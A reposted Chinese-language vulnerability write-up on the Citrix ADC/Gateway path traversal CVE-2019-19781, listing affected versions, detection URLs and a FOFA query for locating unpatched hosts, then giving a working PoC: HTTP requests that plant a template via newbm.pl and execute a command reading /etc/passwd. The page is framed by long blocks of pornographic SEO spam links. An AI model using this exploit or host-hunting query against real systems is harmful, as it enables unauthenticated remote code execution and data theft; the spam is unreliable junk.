日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

Citrix路径遍历(CVE-2019-19781)

發(fā)布時(shí)間:2025/3/15 编程问答 25 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Citrix路径遍历(CVE-2019-19781) 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

漏洞描述

Citrix旗下多款交付控制器和網(wǎng)關(guān)存在RCE漏洞,攻擊者在無(wú)需身份驗(yàn)證的情況下就可執(zhí)行任意命令。根據(jù)其他安全網(wǎng)站的說(shuō)法,這個(gè)RCE漏洞會(huì)有一個(gè)標(biāo)記漏洞(其中之一的標(biāo)記),即本次報(bào)道的Citrx路徑遍歷漏洞(CVE-2019-19781)。Citrx路徑遍歷漏洞(CVE-2019-19781)利用方式的PoC已被公開(kāi)。該漏洞利用復(fù)雜性低,且無(wú)權(quán)限要求,攻擊者只能遍歷vpns文件夾,但攻擊者可能利用Citrx路徑遍歷漏洞進(jìn)行RCE漏洞試探,從而發(fā)起進(jìn)一步精準(zhǔn)攻擊。

影響范圍

Citrix NetScaler ADC and NetScaler Gateway version 10.5,Citrix ADC and NetScaler Gateway version 11.1 , 12.0 , 12.1 ,Citrix ADC and Citrix Gateway version 13.0

漏洞檢測(cè)方法

根據(jù)此次公開(kāi)的PoC顯示,該洞目錄遍歷被限制子在vpns文件夾下,任意用戶可通過(guò)HTTP請(qǐng)求直接訪問(wèn)該目錄下的文件。

https://xx.xx.xx.xx/vpn/../vpns/services.html https://xx.xx.xx.xx/vpn/../vpns/smb.conf 如果沒(méi)有修復(fù)的話的會(huì)返回 http 200

通過(guò)fofa搜索

title="Citrix"

目前還是有很多沒(méi)打補(bǔ)丁的

附上POC,建議修改文件名,文件名為:jas502n

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 Host: 192.168.3.244 User-Agent: 1 Connection: close NSC_USER: ../../../netscaler/portal/templates/jas502n NSC_NONCE: nsroot Content-Length: 97url=http://example.com&title=jas502n&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]

請(qǐng)求上傳的內(nèi)容

GET /vpn/../vpns/portal/jas502n.xml HTTP/1.1 Host: 192.168.3.244 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close NSC_USER: nsroot NSC_NONCE: nsroot Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0

以上代碼來(lái)自jas502n大佬,GitHub地址:https://github.com/jas502n/CVE-2019-19781

修復(fù)建議

請(qǐng)參考官方緩解措施:https://support.citrix.com/article/CTX267679

新人創(chuàng)作打卡挑戰(zhàn)賽發(fā)博客就能抽獎(jiǎng)!定制產(chǎn)品紅包拿不停!

總結(jié)

以上是生活随笔為你收集整理的Citrix路径遍历(CVE-2019-19781)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 人人射av| 麻豆视屏| 日本在线播放 | 性激烈视频在线观看 | av成人毛片 | 国产精品久久久爽爽爽麻豆色哟哟 | 欧美乱妇狂野欧美视频 | 少妇高潮伦 | 日韩精品在线观看免费 | 精品1卡二卡三卡四卡老狼 日韩三级网 | 2021av视频| 向日葵视频在线播放 | 手机看片福利在线 | 成人美女在线观看 | 少妇被又大又粗又爽毛片久久黑人 | 久久午夜激情 | 国产精品久久国产愉拍 | 国产精品老熟女视频一区二区 | 97干干| 成人区视频 | 国产亚洲欧美日韩精品一区二区三区 | 黄色av片三级三级三级免费看 | 影音先锋在线看片资源 | 性欧美极品 | 黄色不打码视频 | 亚洲第一页夜 | 午夜精品一区二区三区三上悠亚 | 嫩草嫩草嫩草嫩草嫩草嫩草 | 在线观看网址你懂的 | 男人天堂视频在线观看 | 无码国产精品久久一区免费 | 床上激情网站 | 国产麻豆剧传媒精品国产 | 99精品毛片 | 亚洲国产精品无码久久久 | 在线免费av网 | 91一区二区三区四区 | jizz亚洲女人 | 韩毛片 | 一级在线| 又粗又大又硬又长又爽 | 三级黄色av | 成人午夜网站 | 天天爽夜夜爽一区二区三区 | 美日韩中文字幕 | 1024精品一区二区三区日韩 | 我们俩电影网mp4动漫官网 | 二区三区免费 | 在线观看日韩av | 国产精品国色综合久久 | 久久久久久片 | 九色91porny | 黄色网络在线观看 | 久久久久亚洲av无码专区桃色 | 色视av| 国产精品二区一区二区aⅴ污介绍 | 国产吞精囗交免费视频网站 | 青青青草视频在线 | 99re视频| 深夜福利一区二区 | 欧美一区二区国产 | 区一区二在线观看 | 国产伦精品一区二区免费 | 快射视频在线观看 | 男女午夜啪啪 | 欧美三级午夜理伦三级中视频 | 天堂在线观看免费视频 | 色www亚洲国产张柏芝 | 麻豆av片 | av在观看 | 久久久久亚洲av片无码下载蜜桃 | 天堂√在线 | 777精品久无码人妻蜜桃 | 欧美日韩一二区 | 99热99| 日韩毛片在线观看 | 男人女人拔萝卜视频 | 欧美色图888| 久久精品亚洲a | 久久精品一区二区三 | 日韩在线视频网址 | 第四色视频 | 深夜福利国产精品 | 日本后进式猛烈xx00动态图 | 性涩av| 精品国产一区二区三区性色av | 在线视频观看免费 | 国产婷婷色一区二区 | 国产日批视频在线观看 | 日本精品在线看 | 欧美三级午夜理伦 | 91蜜桃视频在线观看 | 色一区二区 | 91精品色| 久久精品色妇熟妇丰满人妻 | 精品国产乱码久久久久久1区2区 | 亚洲精品网站在线观看 | 日韩一级二级视频 | 香蕉91视频 |